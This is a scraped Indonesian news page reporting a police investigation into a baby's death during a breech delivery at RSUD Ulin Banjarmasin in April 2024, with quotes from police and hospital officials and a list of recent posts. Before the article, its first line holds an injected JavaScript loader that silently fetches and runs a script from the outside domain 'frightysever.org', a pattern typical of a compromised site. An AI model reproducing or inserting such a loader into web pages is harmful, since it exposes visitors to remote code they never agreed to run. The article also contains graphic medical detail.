(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarmasin

Polresta Banjarmasin Tengah Selidiki Kasus Bayi Meninggal Saat Persalinan


KANALKALIMANTAN.COM, BANJARMASIN – Kepolisian dari Satuan Reserse Kriminal (Satreskrim) Polresta Banjarmasin Tengah melakukan penyelidikan proses persalinan yang kemudian mengakibatkan bayi meninggal dunia, di Rumah Sakit Umum Daerah (RSUD) Ulin Banjarmasin.

Penyelidikan diungkapkan Kasatreskrim Polrestabes Banjarmasin, Kompol Thomas Arifin. Sebelumnya pihak keluarga korban, membuat laporan resmi ke Polresta Banjarmasin pada Jumat (19/4/2024) lalu.

“Betul, Polresta Banjarmasin sudah menerima laporan polisi dari keluarga korban terikat dugaan tindak pidana malpraktek di salah satu rumah sakit umum di Kota Banjarmasin,” kata Thomas, kepada awak media, Kamis (26/4/2024) kemarin.

Baca juga: Relokasi Normalisasi Sungai Kuranji di Cempaka Warga Ada yang Tak Setuju

Dijelaskannya, peristiwa bermula ketika seorang ibu berinisial MS (38) melakukan persalinan di rumah sakit tersebut. Proses persalinan berlangsung pada Minggu (14/4/2024) sekitar pukul 04.00 Wita, posisi bayi yang hendak dilahirkan dalam kondisi tidak normal, dalam kondisi sungsang.

Menurut Kasat Reskrim, persalinan tetap dilakukan secara normal, namun naas saat lahir bayi tersebut meninggal, dan kepala bayi yang terputus, masih tertinggal di dalam rahim sang ibu. MS saat ini masih dilakukan perawatan di rumah sakit berbeda yaitu RS Bhayangkara Kota Banjarmasin.

“Posisi bayinya sungsang, namun tetap dilakukan persalinan dengan posisi normal. Sehingga menyebabkan bayi itu kepalanya tertinggal dalam perut sang ibu,” ungkap Kompol Thomas.

Lanjut Thomas, pihaknya telah membentuk tim untuk melakukan penyelidikan kasus. Sebanyak 4 orang saksi dari pihak keluarga sudah dipanggil untuk dimintai keterangan.

Baca juga: Rekrutmen PPK Pilkada 2024 Dibuka! Ini Jadwal, Syarat, Cara Daftar dan Gajinya

“Sudah beberapa saksi kita ambil keterangan, kita sambil maraton untuk mengambil keterangan-keterangan baik dari pihak rumah sakit dan dokter-dokter yang ada pada saat (persalinan) itu,” katanya.

Apa Kata RSUD Ulin Banjarmasin?

Direktur RSUD Ulin Banjarmasin, dr Diauddin belum berkomentar banyak, dirinya menyarankan Kanalkalimantan.com untuk menghubungi bagian Humas RSUD Ulin.

“Hubungi Humas aja,” katanya singkat.

Dihubungi terpisah, Kasi Humas dan Informasi RSUD Ulin Banjarmasin, Yani Setiawan, tak menampik peristiwa meninggalnya bayi pasca persalinan yang terjadi, ditangani tenaga medis di RSUD Ulin.

Dia meyakini jika tenaga kesehatan RSUD Ulin Banjarmasin yang menangani proses persalinan, telah bertindak sesuai dengan standar profesinya. Sedangkan terkait diselidikinya peristiwa itu, pihaknya mengaku akan menghormati proses yang berjalan.

Baca juga: Rumah Kosong di Lingkar Dalam Selatan Banjarmasin Terbakar

“Kita meyakini bahwa tenaga kesehatan kita sudah bertindak sesuai dengan standar, namun kita menghargai dan akan mengikuti seluruh proses pemeriksaan,” katanya kepada kanalkalimantan.com, Jumat (26/4/2024) siang.

Dia juga menekankan agar semua pihak untuk mengutamakan asas praduga tak bersalah.

“Jangan sampai ada pemberitaan yang kesannya menghakimi. Kita, saat ini mengikuti proses yang berjalan dan masih klarifikasi dari masing-masing pihak,” pungkasnya. (Kanalkalimantan.com/Rizki)

Reporter: Rizki
Editor: Rdy

Tagline:


Risa

Recent Posts

Buka Peningkatan Kapasitas Kader PKK se-Kabupaten Banjar, Ini Harapan Nurgita Tiyas

KANALKALIMANTAN.COM, MARTAPURA - Ketua Tim Penggerak PKK Kabupaten Banjar Hj Nurgita Tiyas membuka Peningkatan Kapasitas… Read More

7 jam ago

Klaim Restu PKS Turun di Pilwali Banjarmasin, Mukhyar Cari Dukungan Nasdem

KANALKALIMANTAN.COM, BANJARMASIN - H Mukhyar masuk dalam penjaringan bakal calon Wali Kota Banjarmasin di Sekretariat… Read More

7 jam ago

Nongkrong di Eks Lokalisasi Pembatuan, Dua Perempuan Dibawa Satpol PP

KANALKALIMANTAN.COM, BANJARBARU - Satuan Polisi Pamong Praja (Satpol PP) Kota Banjarbaru kembali menggiring dua perempuan… Read More

8 jam ago

Berhasil Ditekan, Angka Stunting 2023 Kabupaten Kapuas 16,20 Persen

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi mengatakan penilaian kinerja pelaksanaan 8… Read More

8 jam ago

Uji Trayek Angkutan Bus Pengumpan di Kota Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dinas Perhubungan (Dishub) Kota Banjarbaru melakukan uji coba trayek atau rute angkutan… Read More

9 jam ago

Mengulang Pertarungan di Pilgub Kalsel, Denny Indrayana Lamar Nasdem

KANALKALIMANTAN.COM, BANJARBARU - Menjelang Pemilihan Kepala Daerah (Pilkada) 2024 di Provinsi Kalimantan Selatan (Kalsel), kandidat… Read More

12 jam ago

This website uses cookies.